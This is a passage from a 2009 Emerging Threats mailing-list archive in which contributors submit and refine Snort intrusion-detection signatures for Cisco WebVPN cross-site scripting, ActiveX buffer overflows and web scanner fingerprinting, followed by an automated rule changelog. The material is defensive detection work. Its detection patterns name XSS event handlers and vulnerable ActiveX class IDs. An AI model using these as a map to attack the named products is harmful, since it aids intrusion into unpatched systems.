reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=19135;
reference:url,
downloads.securityfocus.com/vulnerabilities/exploits/36546.html;
reference:url,doc.emergingthreats.net/2010012; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks;
sid:2010012; rev:5;)

# PERFORMANCE FIX: Fixed Flow to be before content match for performance,
added in Hex (my preference lol) and incremented the revision number and
then tested
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN
Httprint Web Server Fingerprint Scan"; flow:to_server,established;
content:"GET|20 2F|antidisestablishmentarianism"; depth:33;
classtype:attempted-recon; reference:url,www.net-square.com/httprint/;
reference:url,www.net-square.com/httprint/httprint_paper.html;
reference:url,doc.emergingthreats.net/2008416; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Httprint;
sid:2008416; rev:3;)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091210/dcfca314/attachment-0001.html

From jonkman at jonkmans.com  Thu Dec 10 10:02:33 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 10 Dec 2009 10:02:33 -0500
Subject: [Emerging-Sigs] sigs
In-Reply-To: <e75cc74a0912100645s5036265an94cdcc7fccbfe3ab@mail.gmail.com>
References: <e75cc74a0912100645s5036265an94cdcc7fccbfe3ab@mail.gmail.com>
Message-ID: <7CB7F45D-D666-420B-AFD8-F2D6057FD7B3@jonkmans.com>

Posted, thanks!

Matt

On Dec 10, 2009, at 9:45 AM, Kevin Ross wrote:

> 2 new sigs and a couple of changes. Kev
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt"; flow:established,to_server; uricontent:"|2B|CSCOE|2B 2F|files|2F|browse|2E|html"; nocase; uricontent:"code|3D|init"; nocase; uricontent:"path|3D|ftp"; nocase; classtype:attempted-user; reference:url,www.securityfocus.com/bid/35475/info; reference:cve,2009-1203; sid:11000001; rev:1;)
> 
> # (I Thought this one might still be possible to all those devices which go out and aren't updated, happens all the time with Cisco anyway).
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt"; flow:to_client,established; content:"clsid"; nocase; content:"6EEFD7B1-B26C-440D-B55A-1EC677189F30"; nocase; distance:0; content:"AddRouteEntry"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*6EEFD7B1-B26C-440D-B55A-1EC677189F30/si"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/26288/info; reference:cve,2007-5603; sid:11000002; rev:1;)
> 
> # SUPERFICIAL CHANGES: Additional Reference & addition of EMC to identify product, changed flow to to_client rather than from_server, revision count incremented
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt"; flow:to_client,established; content:"clsid"; nocase; content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; nocase; distance:0; content:"KEYHELP"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B7ECFD41-BE62-11D2-B9A8-00104B138C8C/si"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/36546/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=19135; reference:url,downloads.securityfocus.com/vulnerabilities/exploits/36546.html; reference:url,doc.emergingthreats.net/2010012; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks; sid:2010012; rev:5;)
> 
> # PERFORMANCE FIX: Fixed Flow to be before content match for performance, added in Hex (my preference lol) and incremented the revision number and then tested
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN Httprint Web Server Fingerprint Scan"; flow:to_server,established; content:"GET|20 2F|antidisestablishmentarianism"; depth:33; classtype:attempted-recon; reference:url,www.net-square.com/httprint/; reference:url,www.net-square.com/httprint/httprint_paper.html; reference:url,doc.emergingthreats.net/2008416; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Httprint; sid:2008416; rev:3;)
> 
> 
> 
> 
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From kevross33 at googlemail.com  Thu Dec 10 15:40:44 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Thu, 10 Dec 2009 20:40:44 +0000
Subject: [Emerging-Sigs] 2 Cisco Sigs
Message-ID: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt";
flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B
2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|";
within:20;
pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info;
reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950;
reference:cve,2009-1220; sid:14000001; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt";
flow:established,to_server;
uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase;
pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info;
reference:cve,2008-2165; sid:14000002; rev:1;)

Kev
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091210/452f07d5/attachment.html

From jonkman at jonkmans.com  Thu Dec 10 15:49:37 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 10 Dec 2009 15:49:37 -0500
Subject: [Emerging-Sigs] 2 Cisco Sigs
In-Reply-To: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>
References: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>
Message-ID: <4312B0FE-AE04-46BE-94C4-302FC227DA0C@jonkmans.com>

Posted, thanks Kevin!!

Matt

On Dec 10, 2009, at 3:40 PM, Kevin Ross wrote:

> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|"; within:20; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; reference:cve,2009-1220; sid:14000001; rev:1;)
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From evilghost at packetmail.net  Thu Dec 10 16:00:01 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Thu, 10 Dec 2009 15:00:01 -0600
Subject: [Emerging-Sigs] 2 Cisco Sigs
In-Reply-To: <4312B0FE-AE04-46BE-94C4-302FC227DA0C@jonkmans.com>
References: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>
	<4312B0FE-AE04-46BE-94C4-302FC227DA0C@jonkmans.com>
Message-ID: <4B216151.400@packetmail.net>

Matt, since we're detecting XSS I'd like to modify the signatures PCRE 
(proposed earlier in the year) for these XSS sigs to catch all of the 
DOM behaviors.  I could go back and modify all of Kevin's sigs and get a 
huge COMBO-BREAKER and integer overflow the ET scoreboard.  I'll just 
submit these two and if you agree, perhaps you can go back against the 
XSS signs and sed in this new PCRE?

See 
http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004539.html 
for the discussion.  I don't think matching on "src" or "img" in the 
PCRE URI buffer is wise since it should be covered by the other DOM 
event handlers.

pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; 
flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; 
nocase; content:"Host|3A|"; within:20; 
pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; 
reference:cve,2009-1220; sid:14000001; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; 
flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; 
pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)

- evilghost

Matt Jonkman wrote:
> Posted, thanks Kevin!!
>
> Matt
>
> On Dec 10, 2009, at 3:40 PM, Kevin Ross wrote:
>
>   
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|"; within:20; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; reference:cve,2009-1220; sid:14000001; rev:1;)
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)
>>     
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From emerging at emergingthreats.net  Thu Dec 10 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 10 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091210210012.BC0DA4504E@goliath.jonkmans.com>


[***] Results from Oinkmaster started Thu Dec 10 16:00:12 2009 [***]

[+++]          Added rules:          [+++]

 2010456 - ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt (emerging-web_client.rules)
 2010457 - ET WEB_SERVER Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt (emerging-web_server.rules)
 2010458 - ET TROJAN Dropper Checkin - Likely Yahlover Worm (emerging-virus.rules)
 2010459 - ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt (emerging-web_server.rules)
 2010460 - ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt (emerging-web_server.rules)
20010455 - ET USER_AGENTS Suspicious UA string (MSIE7 an) (emerging-user_agents.rules)


[///]     Modified active rules:     [///]

 2007827 - ET USER_AGENTS Suspicious User-Agent - Possible Trojan Downloader (ie) (emerging-user_agents.rules)
 2008416 - ET SCAN Httprint Web Server Fingerprint Scan (emerging-scan.rules)
 2010012 - ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt (emerging-web_client.rules)
 2010333 - ET USER_AGENTS Suspicious User Agent (CrazyBro) (emerging-user_agents.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (9):
        2007827 || ET USER_AGENTS Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,downloads.securityfocus.com/vulnerabilities/exploits/36546.html || url,tools.cisco.com/security/center/viewAlert.x?alertId=19135 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER_AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2010456 || ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt || cve,2007-5603 || url,www.securityfocus.com/bid/26288/info
        2010457 || ET WEB_SERVER Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt || cve,2009-1203 || url,www.securityfocus.com/bid/35475/info
        2010458 || ET TROJAN Dropper Checkin - Likely Yahlover Worm
        2010459 || ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt || cve,2009-1220 || url,tools.cisco.com/security/center/viewAlert.x?alertId=17950 || url,www.securityfocus.com/bid/34307/info
        2010460 || ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt || cve,2008-2165 || url,www.securityfocus.com/bid/29191/info
        20010455 || ET USER_AGENTS Suspicious UA string (MSIE7 an)

     -> Added to emerging-sid-msg.map.txt (9):
        2007827 || ET USER_AGENTS Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,downloads.securityfocus.com/vulnerabilities/exploits/36546.html || url,tools.cisco.com/security/center/viewAlert.x?alertId=19135 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER_AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2010456 || ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt || cve,2007-5603 || url,www.securityfocus.com/bid/26288/info
        2010457 || ET WEB_SERVER Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt || cve,2009-1203 || url,www.securityfocus.com/bid/35475/info
        2010458 || ET TROJAN Dropper Checkin - Likely Yahlover Worm
        2010459 || ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt || cve,2009-1220 || url,tools.cisco.com/security/center/viewAlert.x?alertId=17950 || url,www.securityfocus.com/bid/34307/info
        2010460 || ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt || cve,2008-2165 || url,www.securityfocus.com/bid/29191/info
        20010455 || ET USER_AGENTS Suspicious UA string (MSIE7 an)

     -> Added to emerging-user_agents.rules (1):
        #by Deapesh Misra

     -> Added to emerging-web_client.rules (1):
        # (I Thought this one might still be possible to all those devices which go out and aren't updated, happens all the time with Cisco anyway).

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (99):
        2007827 || ET TROJAN Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER-AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2500422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
